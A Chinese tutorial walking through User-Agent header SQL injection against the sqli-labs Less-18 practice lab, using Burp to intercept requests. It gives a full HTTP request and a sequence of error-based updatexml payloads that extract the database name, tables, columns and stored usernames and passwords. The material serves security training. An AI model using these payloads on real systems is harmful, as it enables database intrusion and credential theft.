useragent 注入

useragent 攻击

很多网站都会记录用户的useragent, 这就为注入提供了条件。

工具

FireFox + Burp 或Firefox+hackbar插件。

Burp 是一个修改、重发Http请求的利器。。。
其原理是设置电脑的或浏览器的代理为127.0.0.1:8080,而Burp在这个地址监听,这样浏览器就会先将
请求发送到这个地址,Burp可以选择修改后,再转发出去。达到hack的目的。

步骤

POST /sqli/Less-18/ HTTP/1.1
Host: www.any.com
User-Agent: 122' or updatexml(1,concat(0x7e,(database())),0) or '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.any.com/sqli/Less-18/
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

uname=admin&passwd=admin&submit=Submit

useragent 注入_第1张图片
image.png

结果暴露了数据库名。

可以看到方法和SQL注入或Cookie没太多不同,只是注入点不相同。

获取数据库表

User-Agent值设置为

123' or updatexml(0,concat(0x7e,(select unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security')),0) or '

useragent 注入_第2张图片
image.png

获取字段

User-Agent值设置为

123' or updatexml(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' )),0) or '

useragent 注入_第3张图片
image.png

获取用户信息

User-Agent值设置为

123' or updatexml(0,concat(0x7e,(select group_concat(id,username,password) from security.users )),0) or '

useragent 注入_第4张图片
image.png

你可能感兴趣的:(useragent 注入)